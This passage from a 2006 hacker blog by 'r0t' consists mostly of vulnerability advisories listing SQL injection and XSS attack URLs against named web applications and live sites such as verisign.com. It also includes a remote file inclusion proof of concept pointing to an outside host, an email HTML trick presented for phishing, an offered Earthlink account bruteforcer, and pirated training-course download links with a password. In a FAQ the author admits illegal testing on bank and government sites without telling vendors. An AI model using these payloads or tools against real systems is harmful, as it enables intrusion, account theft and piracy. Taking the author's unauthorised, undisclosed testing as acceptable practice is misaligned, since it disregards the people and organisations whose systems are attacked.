in=r0t&logged=[SQL]

/cgi-bin/agent_commission_statement.pl?log
in=r0t&logged=&agent_id=[SQL]

/cgi-bin/agent_summary.pl?login=r0t&logged
=&submitted=1&offset=[SQL]

/cgi-bin/agent_camp_det.pl?login=r0t&logged
=[SQL]

/cgi-bin/agent_camp_det.pl?login=r0t&logged
=&camp_id=[SQL]


xssxssxssxssxssxssxssxssxssxssxssxssxssxssxss


2. Multiple XSS vuln.


Leadhound contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "login","logged","camp_id","banner","offset","date","dates","page", paremeters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/cgi-bin/agent_affil.pl?login=[XSS]

/cgi-bin/agent_help.pl?login=[XSS]

/cgi-bin/agent_faq.pl?login=[XSS]

/cgi-bin/agent_faq.pl?login=demo&log
ged=[XSS]

/cgi-bin/agent_help_insert.pl?login=[XSS]

/cgi-bin/agent_help_insert.pl?login=r0t&logg
ed=[XSS]

/cgi-bin/sign_out.pl?login=[XSS]

/cgi-bin/members.pl?login=[XSS]

/cgi-bin/members.pl?login=r0t&logged=[XSS]

/cgi-bin/modify_agent_1.pl?login=[XSS]

/cgi-bin/modify_agent_1.pl?login=r0t&logg
ed=[XSS]

/cgi-bin/modify_agent_2.pl?login=[XSS]

/cgi-bin/modify_agent_2.pl?login=r0t&logg
ed=[XSS]

/cgi-bin/modify_agent.pl?login=[XSS]

/cgi-bin/modify_agent.pl?login=r0t&logg
ed=[XSS]


/cgi-bin/agent_links.pl?login=[XSS]

/cgi-bin/agent_links.pl?login=r0t&logg
ed=[XSS]

/cgi-bin/agent_links.pl?login=r0t&logg
ed=&camp_id=[XSS]

/cgi-bin/agent_links.pl?login=r0t&logg
ed=&camp_id=0&sub=&banner=[XSS]

/cgi-bin/agent_links.pl?login=r0t&logg
ed=&camp_id=0&sub=&banner='0'&move=1&s
ubmitted=1&offset=[XSS]

/cgi-bin/agent_stats_pending_leads.pl?
login=[XSS]

/cgi-bin/agent_logoff.pl?login=[XSS]

/cgi-bin/agent_rev_det.pl?login=[XSS]

/cgi-bin/agent_rev_det.pl?login=r0t&da
tes=[XSS]

/cgi-bin/agent_subaffiliates.pl?log
in=[XSS]

/cgi-bin/agent_subaffiliates.pl?login
=r0t&logged=[XSS]

/cgi-bin/agent_subaffiliates.pl?login=
r0t&logged=&submitted=1&offset=[XSS]

/cgi-bin/agent_subaffiliates.pl?login=
r0t&logged=&submitted=1&offset=0&sub=&
camp_id=[XSS]

/cgi-bin/agent_subaffiliates.pl?login=
r0t&logged=&submitted=1&offset=0&sub=
&camp_id=0&date=[XSS]

/cgi-bin/agent_subaffiliates.pl?login=
r0t&logged=&submitted=1&offset=0&sub=[XSS]

/cgi-bin/agent_commission_statement.pl
?login=r0t&logged=&agent_id=[XSS]

/cgi-bin/agent_stats_pending_leads.pl?
login=[XSS]

/cgi-bin/agent_stats_pending_leads.pl?
login=r0t&logged=[XSS]

/cgi-bin/agent_transactions.pl?login=[XSS]
/cgi-bin/agent_transactions.pl?login=r0t
&logged=[XSS]

/cgi-bin/agent_transactions.pl?login=r0t
&logged=&submitted=1&offset=[XSS]

/cgi-bin/agent_transactions.pl?login=r0t
&logged=&submitted=1&offset=0&sub=&date=[XSS]

/cgi-bin/agent_transactions.pl?login=r0t
&logged=&submitted=1&offset=0&sub=[XSS]

/cgi-bin/agent_payment_history.pl?login=[XSS]

/cgi-bin/agent_summary.pl?login=[XSS]

/cgi-bin/agent_summary.pl?login=r0t&l
ogged=[XSS]

/cgi-bin/agent_summary.pl?login=r0t&l
ogged=&submitted=1&offset=[XSS]

/cgi-bin/agent_summary.pl?login=r0t&l
ogged=&submitted=1&offset=0&date=[XSS]

/cgi-bin/agent_camp_all.pl?login=[XSS]

/cgi-bin/agent_camp_all.pl?login=r0t&l
ogged=[XSS]

/cgi-bin/agent_camp_new.pl?login=[XSS]

/cgi-bin/agent_camp_new.pl?login=r0t&
logged=[XSS]

/cgi-bin/agent_camp_notsub.pl?log
in=[XSS]

/cgi-bin/agent_camp_notsub.pl?login=
r0t&logged=[XSS]

/cgi-bin/agent_campaign.pl?login=[XSS]

/cgi-bin/agent_campaign.pl?login=r0t&
logged=[XSS]

/cgi-bin/agent_camp_expired.pl?login
=r0t&logged=[XSS]

/cgi-bin/agent_camp_expired.pl?login
=[XSS]


/cgi-bin/agent_stats_det.pl?login
=r0t&dates=[XSS]

/cgi-bin/agent_stats_det.pl?login=[XSS]

/cgi-bin/agent_stats.pl?login=[XSS]

/cgi-bin/agent_stats.pl?login=r0t&
logged=[XSS]

/cgi-bin/agent_camp_det.pl?login=r0t&l
ogged=&camp_id=2&page=[XSS]

/cgi-bin/agent_camp_det.pl?login=r0t&l
ogged=&camp_id=[XSS]

/cgi-bin/agent_camp_det.pl?login=r0t&l
ogged=[XSS]

/cgi-bin/agent_camp_det.pl?login=[XSS]

/cgi-bin/agent_camp_sub.pl?login=r0t&l
ogged=[XSS]

/cgi-bin/agent_camp_sub.pl?login=[XSS]

/cgi-bin/agent_affil_list.pl?login=r0t&
logged=[XSS]

/cgi-bin/agent_affil_list.pl?login=[XSS]

/cgi-bin/agent_affil_code.pl?login=[XSS]

/cgi-bin/agent_affil_code.pl?login=r0t&
logged=[XSS]

and

In lost password field enter XSS.

/cgi-bin/lost_pwd.pl [XSS]


###############################################
PS. too much bugs , im geting very tired...:)
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ModernBill multiple SQL inj. vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendor:www.moderngigabyte.com
product link:www.moderngigabyte.net/modernbill/index.htm?ref=home_of_modernbill
affected versions:4.3.2 and previous
###############################################

Vuln. description:


1. SQL injection vuln. with user prem.

ModernBill contains a flaw that allows a remote sql injection attacks.Input passed to the "id"" parameters in "user.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/user.php?op=menu&tile=mysupport&type=
view&id=1[SQL]

/user.php?op=menu&tile=mysupport&type=
details&id=(existing id number)[SQL]

/user.php?op=client_invoice&db_table=
client_invoice&tile=myinvoices&print=
&id=invoice_id|2869[SQL]

2. SQL injection vuln. with admin prem.

ModernBill contains a flaw that allows a remote sql injection attacks.Input passed to the "WHERE+todo_status" "where" "order" "WHERE+call_status" parameters in "admin.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/admin.php?op=view&db_table=todo_list&tile=
todo&where=WHERE+todo_status=[SQL]

/admin.php?op=view&db_table=todo_list&tile=
todo&where=[SQL]

/admin.php?op=view&db_table=todo_list&where=
&order=[SQL]

/admin.php?op=view&db_table=support_desk&tile=
support_desk_list&where=WHERE+call_status=[SQL]

###############################################
notice: to sucessfull exploitation (in 2-th case) attacker must have "admin" premissions.
btw,there is many more mistakes/vulns in admin panel , but as you understand if attacker will have admin premissions he will not need to exploit those vulns.
Also, it was tested on ModernBill Version 4.3.2:B-2:PR:Z:35 , but i think that 5.0 RC1 version have same vuln.
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

BluePay Manager v2.0 Script Insertion Vulnerability

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendor:bluepay.com
affected versions:v2.0 and previous
###############################################

Vuln. description:


Input passed to the "Account Name","Username", field parameters in when user try to login is not properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed.


example:

only manually check:

https://secure.bluepay.com/login

type in those fields some XSS checking charters and you will see.



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Article Publisher Pro SQL inj.

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendor:Scriptsfrenzy.com
product link:http://www.scriptsfrenzy.com/article.html
affected versions: 1.0.1 and previous
###############################################


Vuln. description:

Article Publisher Pro contains a flaw that allows a remote sql injection attacks.Input passed to the "cname" parameter in "category.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:

/category.php?cname=[SQL]



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, April 17, 2006

vuln. on yandex.ru , yahoo.com and others

This vuln. mostly can be used by phishing attacks...
Just Look at screenshot:


In screenshot you see just my email adress , but there can be anything else like redrict to attackers host.

So,attacker must only put on mail html body like in my example:

(?
(TABLE border="1" cellspacing="1" cellpadding="0">
(tr>Please contact administrator (a href=r0t@r00t.it>r0t@r00t.it(/a>
(/table>
(TABLE border="1" cellspacing="1" cellpadding="0">
(tr>Hi victim!(/tr>
(/table>

notice: of course change "(" to "<"


So, it works on yandex.ru , yahoo.com( is already reported and will be fixed soon) and many another email services.

Greetings...

This is my first post to the blog (not a very useful one ;P), I have just become one of the lucky contributors to the blog, I will most probably contribute things a little different from the ones that other contributors are posting, since I'm not into vuln. discovery business, I more like to think of myself as beeing a coder. Currently I am having 101 thing to do both in real/virtual worlds, but since r0t has honored me with an account here, it is my duty to spend some time here, and that's what I'm gonna do. If you want to ask any questions, you can do it in our forums, I will be glad to answer them, I speak English, Latvian and Russian so you can ask questions in any one of those languages. Ok, peace, I'm off to find something interesting for all of you.

Sunday, April 16, 2006

phpLinks <= 2.1.3.1 XSS vuln.

phpLinks <= 2.1.3.1 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 16 april 2006
vendorlink:http://sourceforge.net/projects/phplinks/
affected versions:phpLinks 2.1.3.1 and previous
###############################################

Vuln. Description:


phpLinks contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "term" paremeter in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

http://[victim]/phpLinks_path/index.php?logic=or&maximum
=&term=%22%3Cscript%3Ealert('r0t')%3C/script%3E


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

@ Earthlink.net bruteforce II

Bruteforce for popular email provider earthlink.net and including all that service subdomains


Download

Musicbox vuln.

###############################################
Vuln. discovered by : r0t
Date: 16 april 2006
vendorlink:http://www.musicboxv2.com/
affected versions:2.3.3 and previous
###############################################

Vuln. Description:

1.
Input passed to the "term" parameter when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:

/index.php?in=song&term=%22%3Cscript%3Ealert
%28%27r0t%27%29%3C%2Fscript%3E&action=search&start=0

2.
Musicbox contains a flaw that allows a remote sql injection attacks.Input passed to the "start","type" parameters in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/index.php?in=song&term=r0t&action=search&start=[SQL]
/index.php?action=top&show=10&type=[SQL]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, April 15, 2006

PhpGuestbook v1.0 Script Insertion Vulnerability

###############################################
Vuln. discovered by : r0t
Date: 15 april 2006
vendor:Dubelu
vendorlink:http://www.dubelu.com/
affected versions:PhpGuestbook v1.0 and previous
###############################################

Vuln. Description:

Input passed to the "Name","Website","Comment" field parameters in "PhpGuestbook.php" is not properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, April 12, 2006

TestOut Security+


CD 1
http://rapidshare.de/files/16665116/Security
__SYO-101_Disk_1.part01.TIJNEMA.rar
http://rapidshare.de/files/16666173/Security
__SYO-101_Disk_1.part02.TIJNEMA.rar
http://rapidshare.de/files/16667226/Security
__SYO-101_Disk_1.part03.TIJNEMA.rar
http://rapidshare.de/files/16668278/Security
__SYO-101_Disk_1.part04.TIJNEMA.rar
http://rapidshare.de/files/16669155/Security
__SYO-101_Disk_1.part05.TIJNEMA.rar
http://rapidshare.de/files/16670024/Security
__SYO-101_Disk_1.part06.TIJNEMA.rar
http://rapidshare.de/files/16670178/Security
__SYO-101_Disk_1.part07.TIJNEMA.rar

CD 2
http://rapidshare.de/files/16671066/Security
__SYO-101_Disk_2.part01.TIJNEMA.rar
http://rapidshare.de/files/16671848/Security
__SYO-101_Disk_2.part02.TIJNEMA.rar
http://rapidshare.de/files/16672515/Security
__SYO-101_Disk_2.part03.TIJNEMA.rar
http://rapidshare.de/files/16673161/Security
__SYO-101_Disk_2.part04.TIJNEMA.rar
http://rapidshare.de/files/16870522/Security
__SYO-101_Disk_2.part05.TIJNEMA.rar
http://rapidshare.de/files/16871219/Security
__SYO-101_Disk_2.part06.TIJNEMA.rar

Password:tijnema


Mirror:



CD1:
http://www.megaupload.com/?d=5NN0ESJJ
http://www.megaupload.com/?d=S79XNOPS
http://www.megaupload.com/?d=VCW61J49
http://www.megaupload.com/?d=EHZ78ILM
http://www.megaupload.com/?d=A13NARWK
http://www.megaupload.com/?d=TQSRURQ5
http://www.megaupload.com/?d=9XN0I22K


CD2:

http://www.megaupload.com/?d=UFIBCT6Y
http://www.megaupload.com/?d=25QSV98B
http://www.megaupload.com/?d=UNYW734A
http://www.megaupload.com/?d=F6QA6EE5
http://www.megaupload.com/?d=QS9T32BF
http://www.megaupload.com/?d=RWYWUYBD

Password:tijnema

MonsterTopList

=================================

MonsterTopList- Remote Code Execution bug
By: VietMafia
=================================
Developer site: http://www.monstertoplist.com/
Software: MTL 1.4
Risk: Moderate
Status: unpatched

=================================

This flaw is due to an input validation error in the "sources/functions.php"(line 8)
script that does not validate the "$root_path" variable,remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server

code:file sources/functions.php

line 8: require $root_path . "sources/func_output.php";



demo:

http://www.monstertoplist.com/demo.html



POC Exploit http://[target]/[path]/sources/functions.php?
root_path=http://unsecured-systems.com/forum/

Tuesday, April 11, 2006

r0t FAQ edition 0.9 alfa

Hi again,
Im r0t who reports mostly about new SQL/XSS attack vulnerabillities on net.
So there is some things that i want to do clear:

1)You arent correct with you report.


1.Every from my vulnerabillity report is autmatically reported to 4 vuln. research
teams/bugtraq sites (secunia,osvdb,frsirt,security.nnov.ru)So, thats mean or you are more skilled that we all together or you mis.. some stuff. 99% of all my reports are later verified by bigest and best vulnerabillity researchers on the world.
So i have mistakes also with my reports , cauz sometimes i report vuln. for software wich dont have any public demos or trial versions and my test are only tested on "case study" or clients who use that software.
In that way sometimes vuln researchers after me to verify my report have big problems with that, cauz who wanna test in real examples and of course its ilegall, so you can only imagine how is to prove something doing test on bank sites and .gov sites.
about that of course i have problems with goverments,police and other structures who fight vS "hackers" at all , but its my problem ,not yours.
Do it mean that i had broken laws with my tests and reports?
Yes of course, but as i used only for testing and reporting, i can answer in any justice for that, for my tests and reports.




2)Next time report to vendor!

2.Why i dont report to vendors about vulnerabillities?There was few times when i did report and one of them was Vbulletin my favorite forum developers, when from few reports i didnt get answers in some weeks i automatically forgot about reporting to vendors. Of course not all vendors is like one vendor and one vendor isnt like others.




3) Its isnt profesional when you dont report to vendors.

3.Look if you are one of those vendors who are listed on my blog, so thats shows that you had mistake in your work and your product was unsecured and thats means that you arent profesional, im not a developer im only pentester.




4)Give me live example.

4. If you arent from Secunia,frsirt,osvdb or vendor i will not provide you with any live examples or HowTo´s.So anyway forget about that and RFM!




5)We had fixed that in new realease,delete your report.

5.Look im very glad that you had fixed that vuln., but your vuln. version of your developed software is already in use and many people will use it for while.
Its my reports and nothing will be deleted only if i will recognize that it was my mistake.

6) You are hacker.

6. I never had that idea that im hacker , hacker for me i guru in that skills and knowledge that i dont have. I do only my "job" i report about unsecure systems, with wish that not a vendor ,but software potentional user will now about unsecured systems and he will get more easy to chose witch one software he will use in his project.
Yes of course i admit and moderate some hacker and security boards now , but there i am with another "ID", cauz sometimes to be a r0t, can very dangerous.

7) Apnikushi ir tie bugi, bez Tevis blogs bija daudz labaaks/intresantaaks.

7.Cienijamie LV biedri , visiem kuriem sagada galvassaapes shi bloga apmekleeshana vai mana klaatbuutne, varu ieteikt nekad nenaakt uz sho blogu.
Protams ka piekritiishu, ja teiksat ka shis nav normals blogs utt.
Jo es neesmu nekaads blogu miilis,to var spriezt jau peec taa bardaka kas ir redzams shaja bloga..
Bet taa lai teiktu, ka redz bez Tevis bija daudz lasakamaaks,buutu galiigi stuulbi, jo blogu izveidoju es.
Starpcitu mani neintrese tik daudz LV nets, lai es ar vinju reikkinaatos.



PS.
I hope this FAQ will give answers to most of your questions, if you have any another questions about me or my reports you can mail me: r0t [at] r00t.it

Monday, April 10, 2006

Blog visitors..

Here you see a top10 countries of this blog visitors.
1.United States of America
2.United Kingdom
3.Germany
4.Latvia
5.Canada
6.France
7.Italy
8.Turkey
9.Korea
10.Australia

Im only suprised about Brazil, cauz few month ago Brazil was on 2 place and of course you know why ..but why they left us..intresting:)
Im sure 3 new bugs with file inclusion and they are back in second place:)


Google top10 ref..:


1.childporn
2.prorat 2.0
3.@mile2.com
4.hackers toolkit 2005
5.openedit
6.wikkawiki architecture
7.sqlpoke usage
8.md4 rainbow tables online
9.prorat 1.9 fix2
10.rwauction pro

"Childporn" is half year in da 1 place:)

Top 10 Reffer.. sites:

1.google
2.secunia.com
3.rcf.mitre.org
4.frsirt.com
5.security.nnov.ru
6.securityfocus.com
7.blogger.com
8.nvd.nist.gov
9.hackerscenter.com
10.xforce.iss.net

We use blogger thats why page rank by google is much better than it must be..
If you will try keywords like "XSS vuln" or "SQL vuln" u will get this blog even we dont speak about security only about unsecured systems:)

ShopXS v4.0 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 april 2006
vendor:MK Internet-Service GmbH
vendorlink:http://www.shopxs.de/
affected versions:ShopXS-Version 4.00 and previous
###############################################


Vuln. Description:

Input passed to the search module field parameter when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Greetings to: der4444,xaPridel,cembo,g0df4th3r,
waraxe,FrozenEye,str0ke,RaZbh,rst team,nst team,
Minsk,:[PsiHOdelik]:,damrai,UFoloG,verified team,
clanger,Hello_its_me,johnco,Txuri,The Cracker,
mag2000,fredrau,owen and to all X-ACCESS team!
###############################################
More information @ unsecured-systems.com/forum/

interaktiv.shop v.5 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 april 2006
vendor:http://www.interaktiv.net/
affected versions:.V.5 and prior
###############################################


Vuln. Description:


interaktiv.shop contains a flaws that allows a remote cross site scripting attacks.
Those flaws exists because input passed to "pn" and "sbeg" parameter in "shop_main.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/cgi-bin/interaktiv.shop/front/shop_main.cgi?func
=det&wkid=41587822301246215&rub1=Footprints&rub2=
Architect&artnr=114&pn=%22%3Cscript%3Ealert('r0t'
)%3C/script%3E


/cgi-bin/interaktiv.shop/front/shop_main.cgi?fun
c=searchdo&sfields=&wkid=41587822301246215&rub1_
search=all&sfield=1&sbeg=%22%3Cscript%3Ealert('r
0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Greetings to: der4444,xaPridel,cembo,g0df4th3r,
waraxe,FrozenEye,str0ke,RaZbh,rst team,nst team
###############################################
More information @ unsecured-systems.com/forum/

about Pridels Crew...

Hi peepz,
Some words again about project...
I was missed 3 monthes and didnt was here , also i dint saw for a while RaZbh , i hope that he read this message and will contact me ..But as you see cembo was released his "Alberts" about wich you can know more on our board.
Yeah...board ..board.. its still running on 3.5.1 , but i will upgrade in next days ..
Also i must upgrade our poor site wich uses same script as Astalavista(weeks found XSS vuln. on it)
I was planned that i will post all new vulns at our site, but most of them are just crap and its just some minutes job , so i still post that garbage in this blog , cauz its more easy and faster.
But i saw that some of advisories cembo or der4444 had added from here...

About my friend der4444 he was also here all time , of course not enough time cauz he study and work , everybody have limited time 4 most stuff.
What i wanna say that as crew ,we will need new members of course we dont care about nationality or religion or even political choice , cauz our world is free from that shit and if we are addicted than we are addicted to ourselfes and things what we like to do..
Ok. for intresents in joining to our crew/board/commmunity just go and register @ board and show that you're intresed to help community or to learn or just to join crew.
Pridels Crew need:
Coders,Programmers,Xploiters,Pentesters,Designer,Moderators(with expirience)

join board our mail me r0t [at] r00t.it

PS.
I saw that some eXploiters/hax0rs ask money for some education stuff or for some VIP features , we will not ask any money or donations , cauz we do what we like to do.. And project is sponsored by ourselfes.
We share our skills,our time and thats all!


r0t

Papoo Multiple SQL vuln.

Papoo Multiple SQL vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 april 2006
vendor:http://www.papoo.de/
affected versions: 2.1.5 & 3 beta1 and previous
###############################################

Vuln. description:

Papoo contains a flaw that allows a remote sql injection attacks.Input passed to the "getlang","reporeid" parameters in "index.php" and Input passed to the "msgid" ,"menuid" parameters in "forumthread.php" and Input passed to the "menuid" parameter in "plugin.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/index.php?getlang=[SQL]
/plugin.php?menuid=[SQL]
/index.php?menuid=&reporeid=[SQL]
/forumthread.php?forumid=1&menuid=1&rootid=9895&msgid=[SQL]
/forumthread.php?forumid=1&menuid=[SQL]




###############################################

Aditional info: I did discovered and reported about some sql vulns in Papoo 2.1.2 @ 21.december 2005, and nothing was fixed.
Than Dj_Eyes, Crouz Security Team. had discovered similar vuln.It was in 2.1.4 version @ 2006-02-09..

So, i didnt check if old reported bugs are fixed, just saw that "menuid" is still good one:)

So, GreetZ to Vendors!

here u got refs:

http://pridels.blogspot.com/2005/12/papoo-multiple-sql-vuln.html
http://secunia.com/advisories/18152/

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Verisign.com XSS vuln.

http://www-apps.verisign.com/dpde/linkServer.vwa?
slot_id=%22%3Cscript%3Ealert('r0t')%3C/script%3E

Error 500--Internal Server Error

Sunday, April 09, 2006

APT-webshop-system vuln.

APT-webshop-system vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 april 2006
vendor:http://www.apt-webservice.de/shopsoftware/
affected versions:
4.0 PRO
3.0 BASIC
3.0 LIGHT
###############################################


Vuln. description:


1. SQL injection vuln.

APT-webshop-system contains a flaws that allows a remote sql injection attacks.Input passed to the "group","seite","id" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:


/modules.php?warp=artikel&group=[SQL]
/modules.php?warp=artikel&group=&seite=[SQL]
/modules.php?warp=artikel&group=&seite=&id=[SQL]

2. Full Path Disclosure

An attacker can get full install path by testing SQL attack vuln.



+

Bonnus:


/modules.php?warp=File

&

/modules.php?warp=basket&message=%3Cli%3E%3Ca%
20href=http://r0t.in/%3EUNSECURED%20SYSTEMS%3
C/a%3E%3C/li%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, April 08, 2006

Shopweezle 2.0 multiple vuln.

Shopweezle 2.0 multiple vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 april 2006
vendor:http://shopweezle.de/
affected versions:
ShopWeezle PERSONAL
ShopWeezle PROFESSIONAL
ShopWeezle PROFESSIONAL+
###############################################


Vuln. description:


1. SQL injection vuln.

Shopweezle contains a flaws that allows a remote sql injection attacks.Input passed to the "itemID","brandID","album" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/login.php?caller=xlink&url=detail.php&itemID=1[SQL]
/index.php?x=0&itemgr=1[SQL]
/index.php?caller=xlink&url=brand.php&brandID=1[SQL]
/memo.php?itemID=1[SQL]
/index.php?x=0&caller=xlink&url=gallery.php&album=1[SQL]

2. Full Path Disclosure

An attacker can get full install path by testing SQL attack vuln.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Web+ Shop 5.0 XSS

Web+ Shop 5.0 XSS

###############################################
Vuln. discovered by : r0t
Date: 8 april 2006
vendor:www.talentsoft.com/products/webplusshop/index.en.wml
affected versions:Web+ Shop 5.0 and previous
###############################################

Vuln. description:

Web+ Shop contains a flaw that allows a remote cross site scripting attacks.
This flaw exists because input passed to "deptname" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

http://host.com/cgi-bin/webplus.exe?script=/webpshop/
department.wml&deptid=3&deptname=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, April 05, 2006

vBug Tracker for vBulletin 3.5.x XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 5 april 2006
vendor:www.vbulletin.org
affected versions:vBug Tracker Version 3.5.1 and previous
###############################################

vBug Tracker contains a flaws that allows a remote cross site scripting attacks.
Those flaws exists because input passed to "sortorder" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example :

/vbugs.php?do=list&s=&textsearch=&vbug_typeid
=0&vbug_statusid=0&vbug_severityid=0&vbug_ver
sionid=0&assignment=0&sortfield=lastedit&sort
order=%22%3Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SKForum XSS vuln.

SKForum XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 5 april 2006
vendor:http://soft.killingar.net/documents/SKForum
affected versions:1.5 and prior
###############################################

Vuln. Description:

SKForum contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "areaID" "time" "userID" paremeters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/area.View.action?areaID=[XSS]
/planning.View.action?time=[XSS]
/user.View.action?userID=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, April 01, 2006

Bugzero XSS vuln.

Bugzero XSS vuln.

###############################################
Vuln. discovered by : r0t (unsecured-systems)
Date: 1 april 2006
vendor:http://www.websina.com/bugzero/
affected versions:V.4.3.1 and also development version.
###############################################

Bugzero contains a flaws that allows a remote cross site scripting attacks.
Those flaws exists because input passed to "msg" parameter in "query.jsp" and "entryId" parameter in "edit.jsp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples :

/bugzero/jsp/query.jsp?msg=[XSS]
/bugzero/jsp/edit.jsp?projectId=&entryId=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

 
Copyright (c) 2006 Pridels Sec Crew